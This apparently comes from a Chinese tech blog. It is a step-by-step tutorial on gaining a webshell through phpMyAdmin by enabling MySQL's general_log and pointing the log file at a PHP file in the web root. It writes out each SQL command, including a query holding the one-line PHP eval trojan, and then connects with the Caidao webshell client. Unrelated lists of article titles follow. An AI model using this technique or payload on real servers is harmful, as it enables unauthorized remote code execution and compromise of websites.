general_log默认为关闭的,root权限开启后,general_log_file会保存所有的查询语句

所以可以开启general_log,然后设置general_log_file为一个php文件,最后用一句话木马进行查询来获取webshell

进入phpMyAdmin后在SQL处执行SQL语句

首先查看general log是否开启

show variables like 'general_log';

general log是关闭状态,执行SQL语句开启general log

set global general_log=on;

开启成功

然后把general_log_file设置为shell的绝对路径

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/x.php';

创建的x.php里的内容

然后执行SQL查询语句

SELECT '<?php @eval($_POST["x"]);?>';

执行成功

看一下x.php里的内容

成功插入了一句话木马

用菜刀连接,看看是否能够解析的

连接成功

最新文章

  1. How to remove null value in json string
  2. 2016 Multi-University Training Contest 2 D. Differencia
  3. STL学习
  4. 一个.xib界面文件中设计有多个View
  5. nodejs 安装及部署遇到的问题
  6. Linux内存管理原理【转】
  7. 秀才每天一篇之—SEO是什么?
  8. 创建对象时引用的关键字,assign,copy,retain
  9. eclipse for mac 快捷键
  10. Web 开发模式演变历史和趋势
  11. 深入分析JavaWeb技术内幕(修订版)》【PDF】下载
  12. Linkin大话PC常用快捷键
  13. OpenCV角点检测源代码分析(Harris和ShiTomasi角点)
  14. 吴恩达机器学习笔记54-开发与评价一个异常检测系统及其与监督学习的对比(Developing and Evaluating an Anomaly Detection System and the Comparison to Supervised Learning)
  15. CI框架简单使用
  16. 清空Sql server日志
  17. Java编程基础篇第一章
  18. rsync简介与rsync+inotify配置实时同步数据
  19. 3-安装hive
  20. vue2.0细节剖析

热门文章

  1. [转载]Google Android开发精华教程
  2. mvn 用指定setting.xml 执行指定pom.xml
  3. 【转】Pearson,Spearman,Kendall相关系数的具体分析
  4. sp_rename sqlserver 表 列 索引 类型重命名
  5. spring boot: 组合注解与元注解
  6. 使用Spring MVC表单标(转)
  7. JedisPool的配置参数整理
  8. @angular/cli项目构建--modal
  9. AOE网络——求关键路径
  10. Mac安装SSHFS挂载远程服务器上的文件夹到本地